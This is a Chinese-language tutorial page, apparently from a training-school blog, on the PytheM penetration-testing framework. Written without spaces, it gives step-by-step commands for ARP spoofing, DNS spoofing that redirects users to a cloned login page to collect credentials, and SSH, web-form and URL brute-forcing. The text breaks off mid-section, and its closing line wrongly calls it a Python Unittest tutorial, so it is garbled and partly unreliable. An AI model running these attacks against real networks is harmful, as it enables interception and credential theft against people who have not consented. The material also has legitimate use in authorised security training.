PytheM是一个Python渗透测试框架。它只能在osnGNU/LinuxOS系统上运行。

安装

$sudoapt-getupdate$sudoapt-getinstalllibasound-devlibjack-jackd2-devportaudio19-devpython-pyaudiobuild-essentialpython-devlibnetfilter-queue-devlibespeak1libffi-devlibssl-dev$sudogitclonehttps://github.com/m4n3dw0lf/PytheM/$cdPytheM$sudopipinstall-rrequirements.txt

运行

$sudo./pythem

例子

ARP欺骗-HTTP中间人攻击

命令：

pythem>setinterface[+]Entertheinterface:wlan0pythem>setgateway[+]Enterthegateway:192.168.1.1pythem>arpspoofstart[+]Settingthepacketforwarding.[+]Iptablesredefined.[+]ARPspoofinginitialized.pythem>sniff[+]Enterthefilter:http

ARP+DNS欺骗-重定向到伪造的页面，收集登录凭证

使用SET等克隆工具克隆你选中的网站，并部署在Apache2上

命令：

pythem>settarget[+]Enterthetarget(s):192.168.0.8pythem>setinterfacewlan0pythem>setgateway192.168.0.1pythem>arpspoofstart[+]Settingthepacketforwarding.[+]Iptablesredefined.[+]ARPspoofinginitialized.pythem>dnsspoofstart[+]Domaintobespoofed:www.google.com[+]IPaddresstoberedirected:192.168.0.6[+]DNSspoofinginitialized.pythem>sniffdns

SSH暴破-暴力破解

pythem>servicesshstartpythem>settarget[+]Enterthetarget(s):127.0.0.1pythem>setfilewordlist.txtpythem>brute-forcessh[+]Entertheusernametobruteforce:anon123

Web页面参数暴力破解

首先获取web页面登录时的参数格式id=value

显示重定向页面，如果定向到一个不同的页面则说明猜解正确。

命令

pythem>settargethttp://127.0.0.1/pythem>setfile[+]Enterthepathtothefile:wordlist.txtpythem>brute-forcewebform[+]Brute-Formauthenticationinitialized.[+]Entertheinputidoftheusernamebox:vSIS_ID[+]Entertheinputidofthepasswordbox:vSIS_PASS[+]Entertheusernametobrute-forcetheformulary:root

URL内容爆破

pythem>settarget[+]Enterthetarget(s):http://testphp.vulnweb.com/index.php?id=pythem>setfile1to100.txtpythem>brute-forceurl[+]ContentURLbruterinitialized.

功能

[PytheM–PenetrationTestingFrameworkv0.3.2]

help:

打印帮助信息。

exit/quit:

退出程序。

set:

设置变量的值，参数：

interface

gateway

target

file

arpmode例子:

pythem>setinterface|openinputtoset

或者

pythem>setinterfacewlan0|don'topeninputtosetvalue

print:

打印变量的值，例子：

pythem>printgateway

scan:

进行tcp/manualport/arp扫描.

(应该在设置完网卡和目标后再调用)例子:

pythem>scan

或者

pythem>scantcp

arpspoof:

开始或结束arpspoofing攻击.(使用rep或req可以设置arp欺骗的模式，rep表示欺骗响应，req表示欺骗请求)

参数

start

stop

例子:

arpspoofstartarpspoofstop

dnsspoof:

开始dnsspoofing攻击.(应该在arp欺骗攻击开始后再调用)例子:

pythem>dnsspoofstartpythem>dnsspoofstop

sniff:

开始嗅探数据包(应该在设置网卡后再调用)例子:

pythem>sniffhttp

或者

pythem>sniff

[+]Enterthefilter:port1337andhost10.0.1.5|tcpdumplikeformatorhttp,dnsspecificfilter.

pforensic:

开始分析数据包(应该在设置完网卡和.pcap文件后调用)例子:

pythem>pforensicpforensic>help

brute-force:

开始暴力破解攻击(应该在设置完目标和字典文件路径后调用)参数:

ssh|目标是IP地址ipaddressastargeturl|目标是url(包含http://或https://)webform|目标是url(包含http://或https://)例子:pythem>brute-forcewebformpythem>brute-forcessh

geoip:

显示IP地址的大概位置(应该在设置目标(IP地址)后再调用)例子:

pythem>geoip

或者

pythem>geoip8.8.8.8

decodeandencode:

以选择的模式解码和编码字符串，例子:

pythem>decodebase64pythem>encodeascii

cookiedecode:

解码base64url编码的cookie的值，例子:

pythem>cookiedecode

其它在控制台可以执行的命令，比如cd,ls,nano,cat等。

Jarvis–声音控制助手

[*]jarvistypejarvis-helptoseethejarvishelppage.examples:pythem>jarvis(以语音识

以上内容为大家介绍了Python的Unittest单元测试使用详解，希望对大家有所帮助，如果想要了解更多Python相关知识，请关注IT培训机构:千锋教育。http://www.mobiletrain.org/

上一篇

如何利用 Python 实现简单图片下载功能

下一篇

python的深浅拷贝